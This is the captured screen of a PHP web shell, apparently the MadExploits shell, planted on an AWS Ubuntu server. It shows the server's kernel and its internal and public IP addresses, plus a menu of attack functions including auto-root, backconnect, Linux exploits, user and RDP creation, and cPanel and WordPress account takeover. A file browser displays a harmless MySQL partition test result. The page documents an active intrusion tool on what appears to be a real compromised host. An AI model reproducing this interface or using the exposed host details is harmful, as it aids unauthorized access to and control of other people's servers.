Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 52.14.238.102
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
max_parts /
r /
[ HOME SHELL ]
Name
Size
Permission
Action
innodb-import-partition-1.resu...
1.39
KB
-rw-r--r--
partition_max_parts_hash_innod...
1.77
KB
-rw-r--r--
partition_max_parts_hash_myisa...
2.04
KB
-rw-r--r--
partition_max_parts_inv_innodb...
748.54
KB
-rw-r--r--
partition_max_parts_inv_myisam...
748.54
KB
-rw-r--r--
partition_max_parts_key_innodb...
1.69
KB
-rw-r--r--
partition_max_parts_key_myisam...
1.97
KB
-rw-r--r--
partition_max_parts_list_innod...
413.42
KB
-rw-r--r--
partition_max_parts_list_myisa...
413.7
KB
-rw-r--r--
partition_max_parts_range_inno...
335.05
KB
-rw-r--r--
partition_max_parts_range_myis...
335.32
KB
-rw-r--r--
partition_max_sub_parts_key_li...
201.53
KB
-rw-r--r--
partition_max_sub_parts_key_li...
201.8
KB
-rw-r--r--
partition_max_sub_parts_key_ra...
167.12
KB
-rw-r--r--
partition_max_sub_parts_key_ra...
167.39
KB
-rw-r--r--
partition_max_sub_parts_list_i...
201.51
KB
-rw-r--r--
partition_max_sub_parts_list_m...
201.78
KB
-rw-r--r--
partition_max_sub_parts_range_...
167.09
KB
-rw-r--r--
partition_max_sub_parts_range_...
167.37
KB
-rw-r--r--
partition_open_files_limit.res...
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : partition_max_parts_key_innodb.result
call mtr.add_suppression("A long semaphore wait"); create table t2 (a int not null, primary key(a)) engine='InnoDB' partition by key (a) partitions 8192; show create table t2; Table Create Table t2 CREATE TABLE `t2` ( `a` int(11) NOT NULL, PRIMARY KEY (`a`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 /*!50100 PARTITION BY KEY (a) PARTITIONS 8192 */ 65535 inserts; select count(*) from t2; count(*) 65535 select count(*) from t2 partition (p0); count(*) 8 select count(*) from t2 partition (p10); count(*) 0 select count(*) from t2 partition (p100); count(*) 2 select count(*) from t2 partition (p1000); count(*) 22 select count(*) from t2 partition (p4000); count(*) 2 select count(*) from t2 partition (p8000); count(*) 2 select count(*) from t2 partition (p8191); count(*) 7 select * from t2 partition (p0); a 35503 37977 38009 38108 38109 38140 38141 39061 select * from t2 partition (p10); a select * from t2 partition (p100); a 14987 15903 select * from t2 partition (p1000); a 9883 13835 20549 20581 20680 20681 20682 20683 20712 20713 20714 20715 28741 28773 28872 28873 28874 28875 28904 28905 28906 28907 select * from t2 partition (p4000); a 18959 27151 select * from t2 partition (p8000); a 10373 32379 select * from t2 partition (p8191); a 690 1471 1503 4690 4722 7230 14597 delete from t2 partition (p8191); select * from t2 partition (p8191); a insert into t2 partition (p8191) values (690), (1471); select * from t2 partition (p8191); a 690 1471 update t2 partition (p8191) set a=4690 where a= 690; select * from t2 partition (p8191); a 1471 4690 load data infile 'MYSQL_TMP_DIR/data01' into table t2 partition (p8191) fields terminated by ','; select * from t2 partition (p8191); a 1471 4690 7230 14597 drop table t2;
Close